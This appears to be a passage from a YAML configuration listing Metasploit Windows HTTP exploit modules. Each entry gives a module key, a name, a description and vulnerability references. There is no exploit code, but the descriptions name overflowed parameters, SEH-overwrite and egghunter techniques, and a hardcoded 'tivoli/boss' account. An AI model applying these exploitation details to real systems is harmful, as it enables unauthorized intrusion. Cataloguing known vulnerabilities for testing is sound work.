category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in the MaxDB WebDBM\n\
\t\t\t\tservice. This service is included with many recent versions\n\
\t\t\t\tof the MaxDB and SAPDB products. This particular module is\n\
\t\t\t\tcapable of exploiting Windows systems through the use of an\n\
\t\t\t\tSEH frame overwrite. The offset to the SEH frame may change\n\
\t\t\t\tdepending on where MaxDB has been installed, this module\n\
\t\t\t\tassumes a web root path with the same length as:\n\n\
\t\t\t\tC:\\Program Files\\sdb\\programs\\web\\Documents\n\
\t\t\t"
authors:
- - CVE
- 2005-0684
- - OSVDB
- "15816"
- - URL
- http://www.idefense.com/application/poi/display?id=234&type=vulnerabilities
- - BID
- "13368"
path: extensions/metasploit/
class: Msf_module
msf_servu_session_cookie:
enable: true
msf: true
msf_key: windows/http/servu_session_cookie
name: Rhinosoft Serv-U Session Cookie Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a buffer overflow in Rhinosoft Serv-U 9.0.0.5.\n\
\t\t\t\tSending a specially crafted POST request with an overly long session cookie\n\
\t\t\t\tstring, an attacker may be able to execute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2009-4006
- - OSVDB
- "59772"
- - URL
- http://rangos.de/ServU-ADV.txt
- - URL
- http://lists.grok.org.uk/pipermail/full-disclosure/2009-November/071370.html
path: extensions/metasploit/
class: Msf_module
msf_trackercam_phparg_overflow:
enable: true
msf: true
msf_key: windows/http/trackercam_phparg_overflow
name: TrackerCam PHP Argument Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a simple stack buffer overflow in the\n\
\t\t\t\tTrackerCam web server. All current versions of this software\n\
\t\t\t\tare vulnerable to a large number of security issues. This\n\
\t\t\t\tmodule abuses the directory traversal flaw to gain\n\
\t\t\t\tinformation about the system and then uses the PHP overflow\n\
\t\t\t\tto execute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2005-0478
- - OSVDB
- "13953"
- - OSVDB
- "13955"
- - BID
- "12592"
- - URL
- http://aluigi.altervista.org/adv/tcambof-adv.txt
path: extensions/metasploit/
class: Msf_module
msf_maxdb_webdbm_database:
enable: true
msf: true
msf_key: windows/http/maxdb_webdbm_database
name: MaxDB WebDBM Database Parameter Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in the MaxDB WebDBM\n\
\t\t\t\tservice. By sending a specially-crafted HTTP request that contains\n\
\t\t\t\tan overly long database name. A remote attacker could overflow a buffer\n\
\t\t\t\tand execute arbitrary code on the system with privileges of the wahttp process.\n\n\
\t\t\t\tThis module has been tested against MaxDB 7.6.00.16 and MaxDB 7.6.00.27.\n\
\t\t\t"
authors:
- - CVE
- 2006-4305
- - OSVDB
- "28300"
- - BID
- "19660"
path: extensions/metasploit/
class: Msf_module
msf_zenworks_uploadservlet:
enable: true
msf: true
msf_key: windows/http/zenworks_uploadservlet
name: Novell ZENworks Configuration Management Remote Execution
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a code execution flaw in Novell ZENworks Configuration Management 10.2.0.\n\
\t\t\t\tBy exploiting the UploadServlet, an attacker can upload a malicious file outside of the TEMP directory\n\
\t\t\t\tand then make a secondary request that allows for arbitrary code execution.\n\
\t\t\t"
authors:
- - OSVDB
- "63412"
- - BID
- "39114"
- - URL
- http://www.zerodayinitiative.com/advisories/ZDI-10-078/
- - URL
- http://tucanalamigo.blogspot.com/2010/04/pdc-de-zdi-10-078.html
path: extensions/metasploit/
class: Msf_module
msf_mdaemon_worldclient_form2raw:
enable: true
msf: true
msf_key: windows/http/mdaemon_worldclient_form2raw
name: MDaemon <= 6.8.5 WorldClient form2raw.cgi Stack Buffer Overflow
category: Metasploit
description: "\n\
\t\t\tThis module exploits a stack buffer overflow in Alt-N MDaemon SMTP server for\n\
\t\t\tversions 6.8.5 and earlier. When WorldClient HTTP server is installed (default),\n\
\t\t\ta CGI script is provided to accept html FORM based emails and deliver via MDaemon.exe,\n\
\t\t\tby writing the CGI output to the Raw Queue. When X-FromCheck is enabled (also default),\n\
\t\t\tthe temporary form2raw.cgi data is copied by MDaemon.exe and a stack based\n\
\t\t\toverflow occurs when an excessively long From field is specified.\n\
\t\t\tThe RawQueue is processed every 1 minute by default, to a maximum of 60 minutes.\n\
\t\t\tKeep this in mind when choosing payloads or setting WfsDelay... You'll need to wait.\n\n\
\t\t\tFurthermore, this exploit uses a direct memory jump into a nopsled (which isn't very\n\
\t\t\treliable). Once the payload is written into the Raw Queue by Form2Raw, MDaemon will\n\
\t\t\tcontinue to crash/execute the payload until the CGI output is manually deleted\n\
\t\t\tfrom the queue in C:\\MDaemon\\RawFiles\\*.raw.\n\
\t\t\t"
authors:
- - CVE
- 2003-1200
- - OSVDB
- "3255"
- - BID
- "9317"
path: extensions/metasploit/
class: Msf_module
msf_hp_nnm_snmp:
enable: true
msf: true
msf_key: windows/http/hp_nnm_snmp
name: HP OpenView Network Node Manager Snmp.exe CGI Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.50.\n\
\t\t\t\t\tBy sending a specially crafted CGI request to Snmp.exe, an attacker may be able to execute\n\
\t\t\t\t\tarbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2009-3849
- - OSVDB
- "60933"
path: extensions/metasploit/
class: Msf_module
msf_hp_nnm_getnnmdata_icount:
enable: true
msf: true
msf_key: windows/http/hp_nnm_getnnmdata_icount
name: HP OpenView Network Node Manager getnnmdata.exe (ICount) CGI Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a buffer overflow in HP OpenView Network Node Manager 7.50/7.53.\n\
\t\t\t\tBy sending specially crafted ICount parameter to the getnnmdata.exe CGI,\n\
\t\t\t\tan attacker may be able to execute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2010-1554
- - OSVDB
- "64976"
path: extensions/metasploit/
class: Msf_module
msf_easyftp_list:
enable: true
msf: true
msf_key: windows/http/easyftp_list
name: EasyFTP Server <= 1.7.0.11 list.html path Stack Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack-based buffer overflow in EasyFTP Server 1.7.0.11\n\
\t\t\t\tand earlier. EasyFTP fails to check input size when parsing the 'path' parameter\n\
\t\t\t\tsupplied to an HTTP GET request, which leads to a stack based buffer overflow.\n\
\t\t\t\tEasyFTP allows anonymous access by default; valid credentials are typically\n\
\t\t\t\tunnecessary to exploit this vulnerability.\n\n\
\t\t\t\tAfter version 1.7.0.12, this package was renamed \"UplusFtp\".\n\n\
\t\t\t\tDue to limited space, as well as difficulties using an egghunter, the use of\n\
\t\t\t\tstaged, ORD, and/or shell payloads is recommended.\n\
\t\t\t"
authors:
- - OSVDB
- "66614"
- - URL
- http://www.exploit-db.com/exploits/11500/
path: extensions/metasploit/
class: Msf_module
msf_novell_messenger_acceptlang:
enable: true
msf: true
msf_key: windows/http/novell_messenger_acceptlang
name: Novell Messenger Server 2.0 Accept-Language Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in Novell GroupWise\n\
\t\t\t\tMessenger Server v2.0. This flaw is triggered by any HTTP\n\
\t\t\t\trequest with an Accept-Language header greater than 16 bytes.\n\
\t\t\t\tTo overwrite the return address on the stack, we must first\n\
\t\t\t\tpass a memcpy() operation that uses pointers we supply. Due to the\n\
\t\t\t\tlarge list of restricted characters and the limitations of the current\n\
\t\t\t\tencoder modules, very few payloads are usable.\n\
\t\t\t"
authors:
- - CVE
- 2006-0992
- - OSVDB
- "24617"
- - BID
- "17503"
path: extensions/metasploit/
class: Msf_module
msf_savant_31_overflow:
enable: true
msf: true
msf_key: windows/http/savant_31_overflow
name: Savant 3.1 Web Server Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in Savant 3.1 Web Server. The service\n\
\t\t\t\tsupports a maximum of 10 threads (for a default install). Each exploit attempt\n\
\t\t\t\tgenerally causes a thread to die whether sucessful or not. Therefore, in a default\n\
\t\t\t\tconfiguration, you only have 10 chances.\n\n\
\t\t\t\tDue to the limited space available for the payload in this exploit module, use of the\n\
\t\t\t\t\"ord\" payloads is recommended.\n\
\t\t\t"
authors:
- - CVE
- 2002-1120
- - OSVDB
- "9829"
- - BID
- "5686"
- - URL
- http://www.milw0rm.com/exploits/787
path: extensions/metasploit/
class: Msf_module
msf_ipswitch_wug_maincfgret:
enable: true
msf: true
msf_key: windows/http/ipswitch_wug_maincfgret
name: Ipswitch WhatsUp Gold 8.03 Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a buffer overflow in IPswitch WhatsUp Gold 8.03. By\n\
\t\t\t\tposting a long string for the value of 'instancename' in the _maincfgret.cgi\n\
\t\t\t\tscript an attacker can overflow a buffer and execute arbitrary code on the system.\n\
\t\t\t"
authors:
- - CVE
- 2004-0798
- - OSVDB
- "9177"
- - BID
- "11043"
path: extensions/metasploit/
class: Msf_module
msf_xitami_if_mod_since:
enable: true
msf: true
msf_key: windows/http/xitami_if_mod_since
name: Xitami 2.5c2 Web Server If-Modified-Since Overflow
category: Metasploit
description: "\n\
\t\t\t\tThis module exploits a stack buffer overflow in the iMatix Corporation\n\
\t\t\t\tXitami Web Server. If a malicious user sends an\tIf-Modified-Since\n\
\t\t\t\theader containing an overly long string, it may be possible to\n\
\t\t\t\texecute a payload remotely. Due to size constraints, this module uses\n\
\t\t\t\tthe Egghunter technique.\n\
\t\t\t"
authors:
- - CVE
- 2007-5067
- - OSVDB
- "40594"
- - OSVDB
- "40595"
- - BID
- "25772"
- - URL
- http://www.milw0rm.com/exploits/4450
path: extensions/metasploit/
class: Msf_module
msf_ia_webmail:
enable: true
msf: true
msf_key: windows/http/ia_webmail
name: IA WebMail 3.x Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis exploits a stack buffer overflow in the IA WebMail server.\n\
\t\t\t\tThis exploit has not been tested against a live system at\n\
\t\t\t\tthis time.\n\
\t\t\t"
authors:
- - CVE
- 2003-1192
- - OSVDB
- "2757"
- - BID
- "8965"
- - URL
- http://www.k-otik.net/exploits/11.19.iawebmail.pl.php
path: extensions/metasploit/
class: Msf_module
msf_hp_nnm_ovas:
enable: true
msf: true
msf_key: windows/http/hp_nnm_ovas
name: HP OpenView NNM 7.53, 7.51 OVAS.EXE Pre-Authentication Stack Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in HP OpenView Network Node Manager versions 7.53 and earlier.\n\
\t\t\t\tSpecifically this vulnerability is caused by a failure to properly handle user supplied input within the\n\
\t\t\t\tHTTP request including headers and the actual URL GET request.\n\n\
\t\t\t\tExploitation is tricky due to character restrictions. It was necessary to utilize a egghunter shellcode\n\
\t\t\t\twhich was alphanumeric encoded by muts in the original exploit.\n\n\
\t\t\t\tIf you plan on using exploit this for a remote shell, you will likely want to migrate to a different process\n\
\t\t\t\tas soon as possible. Any connections get reset after a short period of time. This is probably some timeout\n\
\t\t\t\thandling code that causes this.\n\
\t\t\t"
authors:
- - CVE
- 2008-1697
- - OSVDB
- "43992"
- - BID
- "28569"
path: extensions/metasploit/
class: Msf_module
msf_sybase_easerver:
enable: true
msf: true
msf_key: windows/http/sybase_easerver
name: Sybase EAServer 5.2 Remote Stack Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in the Sybase EAServer Web\n\
\t\t\t\tConsole. The offset to the SEH frame appears to change depending\n\
\t\t\t\ton what version of Java is in use by the remote server, making this\n\
\t\t\t\texploit somewhat unreliable.\n\
\t\t\t"
authors:
- - CVE
- 2005-2297
- - OSVDB
- "17996"
- - BID
- "14287"
path: extensions/metasploit/
class: Msf_module
msf_privatewire_gateway:
enable: true
msf: true
msf_key: windows/http/privatewire_gateway
name: Private Wire Gateway Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis exploits a buffer overflow in the ADMCREG.EXE used\n\
\t\t\t\tin the PrivateWire Online Registration Facility.\n\
\t\t\t"
authors:
- - CVE
- 2006-3252
- - OSVDB
- "26861"
- - BID
- "18647"
path: extensions/metasploit/
class: Msf_module
msf_belkin_bulldog:
enable: true
msf: true
msf_key: windows/http/belkin_bulldog
name: Belkin Bulldog Plus Web Service Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in Belkin Bulldog Plus\n\
\t\t\t\t4.0.2 build 1219. When sending a specially crafted http request,\n\
\t\t\t\tan attacker may be able to execute arbitrary code.\n\
\t\t\t"
authors:
- - OSVDB
- "54395"
- - BID
- "34033"
path: extensions/metasploit/
class: Msf_module
msf_shoutcast_format:
enable: true
msf: true
msf_key: windows/http/shoutcast_format
name: SHOUTcast DNAS/win32 1.9.4 File Request Format String Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a format string vulnerability in the\n\
\t\t\t\tNullsoft SHOUTcast server for Windows. The vulnerability is\n\
\t\t\t\ttriggered by requesting a file path that contains format\n\
\t\t\t\tstring specifiers. This vulnerability was discovered by\n\
\t\t\t\tTomasz Trojanowski and Damian Put.\n\
\t\t\t"
authors:
- - CVE
- 2004-1373
- - OSVDB
- "12585"
- - BID
- "12096"
path: extensions/metasploit/
class: Msf_module
msf_hp_nnm_webappmon_ovjavalocale:
enable: true
msf: true
msf_key: windows/http/hp_nnm_webappmon_ovjavalocale
name: HP NNM CGI webappmon.exe OvJavaLocale Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.53.\n\
\t\t\t\tBy sending a request continaing a cookie longer than 5120 bytes, an attacker can overflow\n\
\t\t\t\ta stack buffer and execute arbitrary code.\n\n\
\t\t\t\tThe vulnerable code is within the OvWwwDebug function. The static-sized stack buffer is\n\
\t\t\t\tdeclared within this function. When the vulnerability is triggered, the stack trace looks\n\
\t\t\t\tlike the following:\n\n\
\t\t\t\t\t#0 ...\n\
\t\t\t\t\t#1 sprintf_new(local_stack_buf, fmt, cooke);\n\
\t\t\t\t\t#2 OvWwwDebug(\" HTTP_COOKIE=%s\\n\", cookie);\n\
\t\t\t\t\t#3 ?OvWwwInit@@YAXAAHQAPADPBD@Z(x, x, x);\n\
\t\t\t\t\t#4 sub_405ee0(\"nnm\", \"webappmon\");\n\n\
\t\t\t\tNo validation is done on the cookie argument. There are no stack cookies, so exploitation\n\
\t\t\t\tis easily achieved by overwriting the saved return address or SEH frame.\n\n\
\t\t\t\tThe original advisory detailed an attack vector using the \"OvJavaLocale\" cookie being\n\
\t\t\t\tpassed in a request ot \"webappmon.exe\". Further research shows that several different\n\
\t\t\t\tcookie values, as well as several different CGI applications, can be used.\n\
\t\t\t'"
authors:
- - CVE
- 2010-2709
- - OSVDB
- "66932"
- - BID
- "42154"
- - URL
- http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02446520
- - URL
- http://www.coresecurity.com/content/hp-nnm-ovjavalocale-buffer-overflow
path: extensions/metasploit/
class: Msf_module
msf_hp_nnm_webappmon_execvp:
enable: true
msf: true
msf_key: windows/http/hp_nnm_webappmon_execvp
name: HP OpenView Network Node Manager execvp_nc Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.53\n\
\t\t\t\tprior to NNM_01207 or NNM_01206 without the SSRT100025 hotfix. By specifying a long 'sel'\n\
\t\t\t\tparameter when calling methods within the 'webappmon.exe' CGI program, an attacker can\n\
\t\t\t\tcause a stack-based buffer overflow and execute arbitrary code.\n\n\
\t\t\t\tThis vulnerability is not triggerable via a GET request due to limitations on the\n\
\t\t\t\trequest size. The buffer being targetted is 16384 bytes in size. There are actually two\n\
\t\t\t\tadjacent buffers that both get overflowed (one into the other), and strcat is used.\n\n\
\t\t\t\tThe vulnerable code is within the \"execvp_nc\" function within \"ov.dll\" prior to\n\
\t\t\t\tv 1.30.12.69. There are no stack cookies, so exploitation is easily achieved by\n\
\t\t\t\toverwriting the saved return address or SEH frame.\n\n\
\t\t\t\tThis vulnerability might also be triggerable via other CGI programs, however this was\n\
\t\t\t\tnot fully investigated.\n\
\t\t\t"
authors:
- - CVE
- 2010-2703
- - OSVDB
- "66514"
- - BID
- "41829"
- - URL
- http://www.vupen.com/english/advisories/2010/1866
- - URL
- http://www.zerodayinitiative.com/advisories/ZDI-10-137/
- - URL
- http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02286088
path: extensions/metasploit/
class: Msf_module
msf_steamcast_useragent:
enable: true
msf: true
msf_key: windows/http/steamcast_useragent
name: Streamcast <= 0.9.75 HTTP User-Agent Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in Streamcast <= 0.9.75. By sending\n\
\t\t\t\t\tan overly long User-Agent in an HTTP GET request, an attacker may be able to\n\
\t\t\t\t\texecute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2008-0550
- - OSVDB
- "42670"
- - URL
- http://aluigi.altervista.org/adv/steamcazz-adv.txt
- - BID
- "33898"
path: extensions/metasploit/
class: Msf_module
msf_fdm_auth_header:
enable: true
msf: true
msf_key: windows/http/fdm_auth_header
name: Free Download Manager Remote Control Server Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in Free Download Manager\n\
\t\t\t\tRemote Control 2.5 Build 758. When sending a specially crafted\n\
\t\t\t\tAuthorization header, an attacker may be able to execute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2009-0183
- - OSVDB
- "51745"
path: extensions/metasploit/
class: Msf_module
msf_hp_nnm_ovwebsnmpsrv_main:
enable: true
msf: true
msf_key: windows/http/hp_nnm_ovwebsnmpsrv_main
name: HP OpenView Network Node Manager ovwebsnmpsrv.exe main Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.53\n\
\t\t\t\tprior to NNM_01203. By specifying a long 'arg' parameter when executing the 'jovgraph.exe'\n\
\t\t\t\tCGI program, an attacker can cause a stack-based buffer overflow and execute arbitrary code.\n\n\
\t\t\t\tThis vulnerability is triggerable via either a GET or POST request. The buffer being\n\
\t\t\t\twritten to is 1024 bytes in size. It is important to note that this vulnerability must\n\
\t\t\t\tbe exploited by overwriting SEH. Otherwise, CVE-2010-1961 is triggered!\n\n\
\t\t\t\tThe vulnerable code is within the \"main\" function within \"ovwebsnmpsrv.exe\" with a\n\
\t\t\t\ttimestamp prior to April 7th, 2010. There are no stack cookies, so exploitation is\n\
\t\t\t\teasily achieved by overwriting SEH structures.\n\n\
\t\t\t\tThere exists some unreliability when running this exploit. It is not completely clear why\n\
\t\t\t\tat this time, but may be related to OVWDB or session management. Also, on some attempts\n\
\t\t\t\tOV NNM may report invalid characters in the URL. It is not clear what is causing this\n\
\t\t\t\teither.\n\
\t\t\t"
authors:
- - CVE
- 2010-1964
- - OSVDB
- "65552"
- - BID
- "40873"
- - URL
- http://www.zerodayinitiative.com/advisories/ZDI-10-108/
- - URL
- http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02217439
path: extensions/metasploit/
class: Msf_module
msf_ibm_tpmfosd_overflow:
enable: true
msf: true
msf_key: windows/http/ibm_tpmfosd_overflow
name: IBM TPM for OS Deployment 5.1.0.x rembo.exe Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis is a stack buffer overflow exploit for IBM Tivoli Provisioning Manager\n\
\t\t\t\tfor OS Deployment version 5.1.0.X.\n\
\t\t\t"
authors:
- - CVE
- 2007-1868
- - OSVDB
- "34678"
- - BID
- "23264"
- - URL
- http://dvlabs.tippingpoint.com/advisory/TPTI-07-05
path: extensions/metasploit/
class: Msf_module
msf_ibm_tsm_cad_header:
enable: true
msf: true
msf_key: windows/http/ibm_tsm_cad_header
name: IBM Tivoli Storage Manager Express CAD Service Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in the IBM Tivoli Storage Manager Express CAD Service (5.3.3).\n\
\t\t\t\tBy sending an overly long GET request, it may be possible for an attacker to execute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2007-4880
- - OSVDB
- "38161"
- - BID
- "25743"
path: extensions/metasploit/
class: Msf_module
msf_hp_nnm_ovwebsnmpsrv_uro:
enable: true
msf: true
msf_key: windows/http/hp_nnm_ovwebsnmpsrv_uro
name: HP OpenView Network Node Manager ovwebsnmpsrv.exe Unrecognized Option Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.53\n\
\t\t\t\tprior to NNM_01203. By specifying a long 'arg' parameter when executing the 'jovgraph.exe'\n\
\t\t\t\tCGI program, an attacker can cause a stack-based buffer overflow and execute arbitrary code.\n\
\t\t\t\tThe vulnerable code is within the option parsing function within \"ovwebsnmpsrv.exe\" with a\n\
\t\t\t\ttimestamp prior to April 7th, 2010.\n\n\
\t\t\t\tReaching the vulnerable code requires a 'POST' request with an 'arg' parameter that, when combined\n\
\t\t\t\twith a some static text, exceeds 10240 bytes. The parameter must begin with a dash. It is\n\
\t\t\t\timportant to note that this vulnerability must be exploited by overwriting SEH. This is since\n\
\t\t\t\toverflowing the buffer with controllable data always triggers an access violation when\n\
\t\t\t\tattempting to write static text beyond the end of the stack.\n\n\
\t\t\t\tExploiting this issue is a bit tricky due to a restrictive character set. In order to accomplish\n\
\t\t\t\tarbitrary code execution, a double-backward jump is used in combination with the Alpha2\n\
\t\t\t\tencoder.\n\
\t\t\t"
authors:
- - CVE
- 2010-1960
- - OSVDB
- "65427"
- - BID
- "40637"
- - URL
- http://www.zerodayinitiative.com/advisories/ZDI-10-105/
- - URL
- http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02217439
path: extensions/metasploit/
class: Msf_module
msf_navicopa_get_overflow:
enable: true
msf: true
msf_key: windows/http/navicopa_get_overflow
name: NaviCOPA 2.0.1 URL Handling Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\tThis module exploits a stack buffer overflow in NaviCOPA 2.0.1.\n\
\t\t\t\tThe vulnerability is caused due to a boundary error within the\n\
\t\t\t\thandling of URL parameters.\n\
\t\t\t"
authors:
- - CVE
- 2006-5112
- - OSVDB
- "29257"
- - BID
- "20250"
path: extensions/metasploit/
class: Msf_module
msf_manageengine_apps_mngr:
enable: true
msf: true
msf_key: windows/http/manageengine_apps_mngr
name: ManageEngine Applications Manager Authenticated Code Execution
category: Metasploit
description: "\n\
\t\t\t\t\t\tThis module logs into the Manage Engine Appplications Manager to upload a \n\
\t\t\t\t\tpayload to the file system and a batch script that executes the payload. "
authors: []
path: extensions/metasploit/
class: Msf_module
msf_sapdb_webtools:
enable: true
msf: true
msf_key: windows/http/sapdb_webtools
name: SAP DB 7.4 WebTools Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in SAP DB 7.4 WebTools.\n\
\t\t\t\tBy sending an overly long GET request, it may be possible for\n\
\t\t\t\tan attacker to execute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2007-3614
- - OSVDB
- "37838"
- - BID
- "24773"
path: extensions/metasploit/
class: Msf_module
msf_ibm_tivoli_endpoint_bof:
enable: true
msf: true
msf_key: windows/http/ibm_tivoli_endpoint_bof
name: IBM Tivoli Endpoint Manager POST Query Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack based buffer overflow in the way IBM Tivoli \n\
\t\t\t\tEndpoint Manager versions 3.7.1, 4.1, 4.1.1, 4.3.1 handles long POST query \n\
\t\t\t\targuments.\n\n\
\t\t\t\tThis issue can be triggered by sending a specially crafted HTTP POST request to \n\
\t\t\tthe service (lcfd.exe) listening on TCP port 9495. To trigger this issue authorization\n\
\t\t\tis required. This exploit makes use of a second vulnerability, a hardcoded account \n\
\t\t\t(tivoli/boss) is used to bypass the authorization restriction.\n\
\t\t\t"
authors:
- - CVE
- 2011-1220
- - OSVDB
- "72713"
- - OSVDB
- "72751"
- - BID
- "48049"
- - URL
- http://www.zerodayinitiative.com/advisories/ZDI-11-169/
path: extensions/metasploit/
class: Msf_module
msf_apache_chunked:
enable: true
msf: true
msf_key: windows/http/apache_chunked
name: Apache Win32 Chunked Encoding
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits the chunked transfer integer wrap\n\
\t\t\t\tvulnerability in Apache version 1.2.x to 1.3.24. This\n\
\t\t\t\tparticular module has been tested with all versions of the\n\
\t\t\t\tofficial Win32 build between 1.3.9 and 1.3.24. Additionally,\n\
\t\t\t\tit should work against most co-branded and bundled versions\n\
\t\t\t\tof Apache (Oracle 8i, 9i, IBM HTTPD, etc).\n\n\
\t\t\t\tYou will need to use the Check() functionality to determine\n\
\t\t\t\tthe exact target version prior to launching the exploit. The\n\
\t\t\t\tversion of Apache bundled with Oracle 8.1.7 will not\n\
\t\t\t\tautomatically restart, so if you use the wrong target value,\n\
\t\t\t\tthe server will crash.\n\
\t\t\t"
authors:
- - CVE
- 2002-0392
- - OSVDB
- "838"
- - BID
- "5033"
- - URL
- http://lists.insecure.org/lists/bugtraq/2002/Jun/0184.html
path: extensions/metasploit/
class: Msf_module
msf_hp_power_manager_login:
enable: true
msf: true
msf_key: windows/http/hp_power_manager_login
name: Hewlett-Packard Power Manager Administration Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in Hewlett-Packard Power Manager 4.2.\n\
\t\t\t\tSending a specially crafted POST request with an overly long Login string, an\n\
\t\t\t\tattacker may be able to execute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2009-2685
- - OSVDB
- "59684"
path: extensions/metasploit/
class: Msf_module
msf_hp_nnm_openview5:
enable: true
msf: true
msf_key: windows/http/hp_nnm_openview5
name: HP OpenView Network Node Manager OpenView5.exe CGI Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.50.\n\
\t\t\t\tBy sending a specially crafted CGI request, an attacker may be able to execute\n\
\t\t\t\tarbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2007-6204
- - OSVDB
- "39530"
- - BID
- "26741"
path: extensions/metasploit/
class: Msf_module
msf_psoproxy91_overflow:
enable: true
msf: true
msf_key: windows/http/psoproxy91_overflow
name: PSO Proxy v0.91 Stack Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\tThis module exploits a buffer overflow in the PSO Proxy v0.91 web server.\n\
\t\t\t\tIf a client sends an excessively long string the stack is overwritten.\n\
\t\t\t"
authors:
- - CVE
- 2004-0313
- - OSVDB
- "4028"
- - URL
- http://www.milw0rm.com/exploits/156
- - BID
- "9706"
path: extensions/metasploit/
class: Msf_module
msf_hp_nnm_snmpviewer_actapp:
enable: true
msf: true
msf_key: windows/http/hp_nnm_snmpviewer_actapp
name: HP OpenView Network Node Manager snmpviewer.exe Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.53\n\
\t\t\t\tprior to NNM_01203. By making a specially crafted HTTP request to the \"snmpviewer.exe\"\n\
\t\t\t\tCGI program, an attacker can cause a stack-based buffer overflow and execute arbitrary\n\
\t\t\t\tcode.\n\n\
\t\t\t\tThe vulnerable code lies within the a function within \"snmpviewer.exe\" with a\n\
\t\t\t\ttimestamp prior to April 7th, 2010. This vulnerability is triggerable via either a GET\n\
\t\t\t\tor POST request. The request must contain 'act' and 'app' parameters which, when\n\
\t\t\t\tcombined, total more than the 1024 byte stack buffer can hold.\n\n\
\t\t\t\tIt is important to note that this vulnerability must be exploited by overwriting SEH.\n\
\t\t\t\tWhile the saved return address can be smashed, a function call that occurs before\n\
\t\t\t\tthe function returns calls \"exit\".\n\
\t\t\t"
authors:
- - CVE
- 2010-1552
- - OSVDB
- "64975"
- - BID
- "40068"
- - URL
- http://www.zerodayinitiative.com/advisories/ZDI-10-083/
- - URL
- http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02153379
path: extensions/metasploit/
class: Msf_module
msf_mailenable_auth_header:
enable: true
msf: true
msf_key: windows/http/mailenable_auth_header
name: MailEnable Authorization Header Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a remote buffer overflow in the MailEnable web service.\n\
\t\t\t\tThe vulnerability is triggered when a large value is placed into the Authorization\n\
\t\t\t\theader of the web request. MailEnable Enterprise Edition versions priot to 1.0.5 and\n\
\t\t\t\tMailEnable Professional versions prior to 1.55 are affected.\n\
\t\t\t"
authors:
- - CVE
- 2005-1348
- - OSVDB
- "15913"
- - OSVDB
- "15737"
- - BID
- "13350"
- - NSS
- "18123"
path: extensions/metasploit/
class: Msf_module
msf_efs_easychatserver_username:
enable: true
msf: true
msf_key: windows/http/efs_easychatserver_username
name: EFS Easy Chat Server Authentication Request Handling Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in EFS Software Easy Chat Server. By\n\
\t\t\t\tsending a overly long authentication request, an attacker may be able to execute\n\
\t\t\t\tarbitrary code.\n\n\
\t\t\t\tNOTE: The offset to SEH is influenced by the installation path of the program.\n\
\t\t\t\tThe path, which defaults to \"C:\\Program Files\\Easy Chat Server\", is concatentated\n\
\t\t\t\twith \"\\users\\\" and the string passed as the username HTTP paramter.\n\
\t\t\t"
authors:
- - CVE
- 2004-2466
- - OSVDB
- "7416"
- - BID
- "25328"
path: extensions/metasploit/
class: Msf_module
msf_apache_modjk_overflow:
